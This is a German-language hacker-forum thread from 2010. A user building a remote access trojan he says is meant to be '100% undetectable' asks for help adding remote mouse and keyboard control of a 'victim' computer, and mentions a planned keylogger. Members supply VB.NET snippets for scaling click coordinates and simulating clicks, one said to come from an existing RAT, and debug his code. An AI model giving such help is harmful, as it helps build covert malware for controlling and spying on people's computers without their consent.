Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 13
  1. #1
    Anfänger
    Registriert seit
    15.08.2010
    Beiträge
    10

    Standard Brauche Hilfe bei Remote Keyboard und Remote Maus

    Hi Leute,

    bin seit ca. 2 Monaten mit der Arbeit an einem neuen Rat beschäftigt, dass mal wieder 100% UD sein soll. Hab mich in der Zeit durch viele Tut's und Codes in Inet durchgeschlagen und hab jetzt schon ziemlich alles drin, bis auf Keylogger und halt Remote Keyboard und Remote Maus. Bei dem Keylogger bin ich zuversichtlich, dass ich das in naher Zukunft erledigt habe, aber mit dem Remote Keyboard und Maus komme ich einfach nicht weiter. Nirgends ist etwas was ich gebrauchen kann. Hab Sufu natürlich schon benutzt. Ich weiß einfach nicht, wie ich das ins Programm reinbekomme, dass man auf dem Victimrechner was anklicken/eintippen kann und es dort die entsprechende Funktion ausführt. Bin allen Helfern dankbar...

    Mfg HackZintheDark
    Geändert von HackZintheDarK (28.11.2010 um 00:52 Uhr)

  2. #2
    Richard Stallman
    Registriert seit
    09.07.2008
    Beiträge
    2.199

    Standard

    Wie funktioniert das Ganze denn logisch betrachtet?
    1. Du brauchst nen Screenshot vom Desktop
    2. Du kannst an eine beliebige Stelle von diesem Bild klicken, und musst dann die Koordinaten des Pixels nehmen, wo du drauf geklickt hast (natürlich von dem Bild ausgehend, und nicht von deinem Desktop) und diese
    3. An dein Victim senden, mit dem Befehl, dass an dieser Stelle ein Klick simuliert werden soll

    Ich kann mir zwar nicht vorstellen, dass du dir diese Module nicht komplett zusammenrippen kannst, aber die Alternative ist sich einzeln den Code für die oben genannten Dinge zu besorgen.

    Wenn man nichts selber programmiert dann kann man halt nicht programmieren.. ist nunmal so.
    Signatur hat Pause..


  3. #3
    Bad Times Virus Avatar von HandyRipper
    Registriert seit
    20.11.2007
    Beiträge
    529

    Standard

    Guten Tag,

    Die Position wo geklickt wurde in der PictureBox kannste dir so ausgeben lassen:

    Private Sub PictureBox1_MouseClick(ByVal sender As System.Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles _ PictureBox1.MouseClick

    MsgBox(e.Location.ToString)

    End Sub
    Aber da Bild und Desktop ja nicht die gleiche größe haben wenn du das Bild z.b. Strechst musste das noch umrechnen anhand der Auflösung des Desktops und der des Bildes. Aber keine Ahnung wie

    Mfg. HandyRipper


    Kontakt : *Zensiert*



  4. #4
    Anfänger
    Registriert seit
    15.08.2010
    Beiträge
    10

    Standard

    @100
    danke für deine Hilfe. Punkt 1 hatte ich schon xD. Punkt 2 hab ich dank HandyRipper und 3 muss ich dann jetzt noch reinbauen...

    @HandyRipper
    vielen Dank. Mit deinem Code hab ich jetzt die X;Y Koordinaten. Habs natürlich noch in eine if-Abfrage mit Checkbox gesetzt. Jetzt sieht er so aus:

    Private Sub PictureBox1_MouseClick(ByVal sender As System.Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles PictureBox1.MouseClick
    If CheckBox1.Checked Then
    MsgBox(e.Location.ToString)
    End If
    End Sub
    Achtet nicht auf meine Postsanzahl... Ich war nur länger inaktiv und musste mich seit 2006 öfters neu anmelden -,-

  5. #5
    Der `Toastflüsterer` Avatar von AlterHacker
    Registriert seit
    27.09.2008
    Beiträge
    690

    Standard

    Ja wo ist das Problem?
    Jetzt etwas Mathematik, die Koordinaten im Verhältnis zur Auflosung hochrechnen und klicken ;-)

    Security is an illusion.
    Cheater : 8=o
    Normaluser : 8=======o
    Ich : 8================o

    BM: (4|2|0)

  6. #6
    CIH-Virus Avatar von krusty
    Registriert seit
    12.10.2008
    Beiträge
    445

    Standard

    remote keyboard sollte ja kein problem sein, dazu gibts ja key-down events, da kannste dir den gedrückten tastenschlag abfangen.
    Jaja, das Übertragen von Koordinaten in andere Koordinatensysteme.
    du brauchst die länge und höhe der picturebox, in der der desktop angezeigt wird, dann brauchst noch die höhe und länge des screens, der aufgezeichnet wird.

    du fängst dir mit nem event die mauskoordinaten der maus auf der picturebox ab.
    du dividierst die y-Mauskoordinate durch die Höhe der Picturebox und multiplizierst das mit der höhe des aufgezeichneten desktop.

    das gleiche mit der x-Mauskoordinate. Du dividierst ihn durch die länge der Picturebox und multiplizierst den wert mit der länge des Desktops.

    Hier mal der ausschnitt ausm echelon RAT:
    Code:
    Dim XWeite As Integer = 'MausX
                Dim YHöhe As Integer = 'MausY
    
                Dim ServerHöhe As Integer = 'Picturebox Höhe (Server ist hier der TCP Server)
                Dim ServerWeite As Integer = 'Picturebox Länge
    
                Dim ClientHöhe As Integer = 'Desktophöhe
                Dim Clientweite As Integer = 'Desktoplänge (Client ist hier Victim)
    
                Dim ClickX As Integer = (XWeite / ServerWeite) * Clientweite
                Dim ClickY As Integer = (YHöhe / ServerHöhe) * ClientHöhe
    ClickX und ClickY sind dann die Koordinaten, die auf dem Desktop geklickt werden sollen.

  7. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    HackZintheDarK (01.12.2010)

  8. #7
    Anfänger
    Registriert seit
    15.08.2010
    Beiträge
    10

    Standard

    Jo, danke krusty hört sich alles sehr logisch an was du sagst.

    Hab das jetzt so mal eingefügt und die entsprechenden Sachen eingetragen. Leider verzieht die Maus noch ein wenig^^. Der Klick wird zwar ausgeführt, aber leider stimmt immernoch was mit den Pixeln nicht.
    Habe folgendes vordefiniert:

    Public Declare Sub mouse_event Lib "user32" Alias "mouse_event" (ByVal dwFlags As Integer, ByVal dx As Integer, ByVal dy As Integer, ByVal cButtons As Integer, ByVal dwExtraInfo As Integer)
    Private Const MOUSEEVENTF_LEFTDOWN = &H2
    Private Const MOUSEEVENTF_LEFTUP = &H4

    Private Sub PictureBox1_MouseClick(ByVal sender As System.Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles PictureBox1.MouseClick
    Dim XWeite As Integer = e.Location.X.ToString 'die Mausklick Koordinaten von X
    Dim YHöhe As Integer = e.Location.Y.ToString 'die Mausklick Koordinaten von Y

    Dim ServerHöhe As Integer = PictureBox1.Height 'Pictureboxhöhe (TCP Server)
    Dim ServerWeite As Integer = PictureBox1.Width 'Pictureboxbreite (TCP Server)

    Dim ClientHöhe As Integer = e.Y.ToString 'Höhe Y des geklickten Pixels beim Opfer
    Dim Clientweite As Integer = e.X.ToString 'Breite X des geklickten Pixels beim Opfer

    Dim ClickX As Integer = (XWeite / ServerWeite) * Clientweite
    Dim ClickY As Integer = (YHöhe / ServerHöhe) * ClientHöhe

    If CheckBox1.Checked Then
    Windows.Forms.Cursor.Position = New Point(ClickX, ClickY) ' Screenposition
    mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)
    mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)
    End If
    End Sub

    is garantiert wieder so ein dummer Fehler...das ist mir schon öfter passiert -,-

    bei dem Bereich Remote Maus krieg ich es echt nicht auf die Reihe...

    HackZintheDarK
    Achtet nicht auf meine Postsanzahl... Ich war nur länger inaktiv und musste mich seit 2006 öfters neu anmelden -,-

  9. #8
    Der mit Anatidaephobie Avatar von blackberry
    Registriert seit
    11.07.2008
    Beiträge
    2.350

    Standard

    Dim ServerHöhe As Integer = PictureBox1.Height 'Pictureboxhöhe (TCP Server)
    Dim ServerWeite As Integer = PictureBox1.Width 'Pictureboxbreite (TCP Server)

    Dim ClientHöhe As Integer = e.Y.ToString 'Höhe Y des geklickten Pixels beim Opfer
    Dim Clientweite As Integer = e.X.ToString 'Breite X des geklickten Pixels beim Opfer

    Ich werde daraus nicht schlau.
    Dim ClickX As Integer = (XWeite / ServerWeite) * Clientweite
    Server... sollten hier die Maße der PictureBox sein auf der du rumklickst und Client... die Auflösung des Opfers (wtf meinst du mit Höhe Y des geklickten Pixels beim Opfer? - diese Werte haben nichts damit zu tun wo jetzt geklickt wurde, sondern nur damit, auf welche Auflösung der Monitor vom Opfer gestellt ist).
    Geändert von blackberry (30.11.2010 um 20:25 Uhr)

    PDFTT cr3w a.E. — ReiDC0Re, lindor, Sera, berry
    please do feed the trolls crew and elk
    Ehrenwerte Mitglieder im Ruhestand: OpCodez, SFX.
    "Was sich blackberry gerade denkt" — Vorsicht! Frei laufender Wahnsinn!
    Zitat von fuckinghot19: "PS: Blackberry ist auf FH der Trollkönig ^^."
    An dieser Stelle danke ich all meinen Fans und Hatern gleichermaßen ^.^

  10. #9
    Anfänger
    Registriert seit
    15.08.2010
    Beiträge
    10

    Standard

    Also wie ich das verstanden habe, sollen ClickX und ClickY die Koordinaten sein, die beim Opfer auf dem Desktop geklickt werden. Dies ergibt sich aus (XWeite / ServerWeite) * Clientweite und (YHöhe / ServerHöhe) * ClientHöhe.
    Heißt (geklickter Punkt X / Pictureboxlänge) * Desktoplänge & (geklickter Punkt Y / Pictureboxhöhe) * Desktophöhe oder nicht ?
    Achtet nicht auf meine Postsanzahl... Ich war nur länger inaktiv und musste mich seit 2006 öfters neu anmelden -,-

  11. #10
    Der mit Anatidaephobie Avatar von blackberry
    Registriert seit
    11.07.2008
    Beiträge
    2.350

    Standard

    Desktoplänge vom Opfer. Bei deinem Code sieht mir das aber nicht danach aus.

    Dim ClientHöhe As Integer = e.Y.ToString 'Höhe Y des geklickten Pixels beim Opfer
    e.Y bzw. e.X ist doch meines Wissens nach die Mausposition relativ zur Form. Hier sollte aber die Höhe bzw. Länge des Monitors vom Opfer stehen.

    PDFTT cr3w a.E. — ReiDC0Re, lindor, Sera, berry
    please do feed the trolls crew and elk
    Ehrenwerte Mitglieder im Ruhestand: OpCodez, SFX.
    "Was sich blackberry gerade denkt" — Vorsicht! Frei laufender Wahnsinn!
    Zitat von fuckinghot19: "PS: Blackberry ist auf FH der Trollkönig ^^."
    An dieser Stelle danke ich all meinen Fans und Hatern gleichermaßen ^.^

  12. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    HackZintheDarK (01.12.2010)

Seite 1 von 2 12 LetzteLetzte

Ähnliche Themen

  1. Remote CMD
    Von o0_X0r_0o im Forum VisualBasic
    Antworten: 13
    Letzter Beitrag: 20.06.2010, 14:01
  2. [F] Keyboard + Maus - Ist es das Geld wert?
    Von Freepler im Forum Kaufberatung
    Antworten: 10
    Letzter Beitrag: 06.12.2008, 14:53
  3. remote und cmd
    Von saibot im Forum Windows
    Antworten: 4
    Letzter Beitrag: 06.01.2007, 10:35

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •